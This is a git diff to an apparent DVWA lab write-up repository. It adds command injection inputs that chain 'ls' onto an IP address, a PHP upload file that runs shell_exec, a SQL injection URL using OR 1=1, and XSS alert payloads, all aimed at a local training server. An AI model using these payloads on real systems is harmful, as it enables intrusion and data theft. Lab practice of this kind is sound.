diff --git a/Command Injection/README.md b/Command Injection/README.md
index a786274..503018c 100644
--- a/Command Injection/README.md	
+++ b/Command Injection/README.md	
@@ -1,10 +1,14 @@
+# Command Injection
+The aim of this challenge is to inject a command to the server that execute a script.
 # Low
 ```bash
 127.0.0.1 && ls
 ```
 
 # Medium
-> In progress
+```bash
+127.0.0.1 & ls
+```
 
 # High
 > In progress
diff --git a/File injection/exploit.php b/File injection/exploit.php
new file mode 100644
index 0000000..0874e35
--- /dev/null
+++ b/File injection/exploit.php	
@@ -0,0 +1,4 @@
+<?php
+$output = shell_exec('ls');
+echo "<pre>$output</pre>";
+?>
\ No newline at end of file
diff --git a/SQL Injection/README.md b/SQL Injection/README.md
index 901e82f..bc313ba 100644
--- a/SQL Injection/README.md	
+++ b/SQL Injection/README.md	
@@ -1,3 +1,6 @@
+# SQL Injection
+The aim of this challenge is to inject a SQL command to the server that execute a script.
+
 # Low
 Full url : http://localhost:4280/vulnerabilities/sqli/?id=test%27+OR+1=1--%27&Submit=Submit#
 
diff --git a/XSS (DOM)/README.md b/XSS (DOM)/README.md
index 74acb03..e3f2a3c 100644
--- a/XSS (DOM)/README.md	
+++ b/XSS (DOM)/README.md	
@@ -1,3 +1,6 @@
+# XSS (DOM)
+The aim of this challenge is to inject a script to the server that execute a script.
+
 # Low 
 Full URL : [http://localhost:4280/vulnerabilities/xss_d/?default=French<script>alert("Hello hacker")</script>]()
 
diff --git a/XSS (Stored)/README.md b/XSS (Stored)/README.md
index 19fa1d3..13de083 100644
--- a/XSS (Stored)/README.md	
+++ b/XSS (Stored)/README.md	
@@ -1,3 +1,5 @@
+# Stored XSS
+The aim of this challenge is to inject a script to the server that execute a script.
 # Low
 ```javascript
 <script>alert("XSS");</script>